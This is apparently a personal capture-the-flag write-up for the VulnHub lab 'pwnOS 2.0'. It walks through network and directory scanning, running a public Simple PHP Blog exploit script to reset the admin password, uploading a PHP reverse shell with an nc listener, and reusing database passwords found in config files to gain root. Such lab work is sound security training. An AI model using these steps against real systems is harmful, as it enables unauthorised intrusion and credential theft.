pwnOS 2.0
Setup
Attacker(kali):10.10.10.128
VulnHub Link:https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
VM Network:VMnet3(Custom)
Enumeration
Host Enumeration
Use the arp-scan to find the vm's IP address: sudo arp-scan -l
Get the BOX's IP :10.10.10.100
Port Enumeration
Perform a quick port enumeration with rustscan: rustscan -a 10.10.10.100
Full scan with nmap: nmap -A -p- 10.10.10.100 -oN nmap.txt
# Nmap 7.93 scan initiated Tue May 2 19:45:29 2023 as: nmap -A -p- -oN nmap.txt 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.00087s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85d32b0109427b204e30036dd18f95ff (DSA)
| 2048 307a319a1bb817e715df89920ecd5828 (RSA)
|_ 256 1012644b7dff6a87372638b1449fcf5e (ECDSA)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Welcome to this Site!
|_http-server-header: Apache/2.2.17 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 2 19:45:38 2023 -- 1 IP address (1 host up) scanned in 9.92 seconds
Directory Enumeration
Use gobuster
to perform a directory bruteforce:gobuster dir -u http://10.10.10.100 -t 100 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
http://10.10.10.100/index
http://10.10.10.100/info
http://10.10.10.100/login
http://10.10.10.100/register
http://10.10.10.100/includes/
http://10.10.10.100/blog/
Check the pages and find out the /info
page is a phpinfo page:
And it looks like I got a blog available:
Foothold
I got the blog app version through view-source, it's Simple PHP Blog 0.4.0:
Check if there any public exploits: searchsploit simple php blog 0.4.0
In order to avoid Metasploit, I copy the 1191.pl out with the command searchsploit -m 1191
Run the script may got some error, it could be fixed with the follow command:
sudo apt-get install libswitch-perl
After fix that, run the script again to learn the usage:
Run with the follow command to change the admin's password:
./1191.pl -h http://10.10.10.100/blog -e 3 -U admin -P admin
Login the /blog
and use the Upload Image
to upload the reverse shell:
The shell's path is /blog/images:
Setup a listening with nc on kali: nc -lvnp 5555
Then click the php-reverse-shell.php and i would get the reverse shell:
Privilege Escalation
I found the mysql root password in /var/www/mysqli_connect.php
:
Try to login to the ssh with it, failed:
But then I got another password in /var/mysqli_connect.php
:
And that's available:
Finally
There is no flag in this box. You get root, You win.
It's a easy box, but it will be worth coming back to later to look for other methods to get root.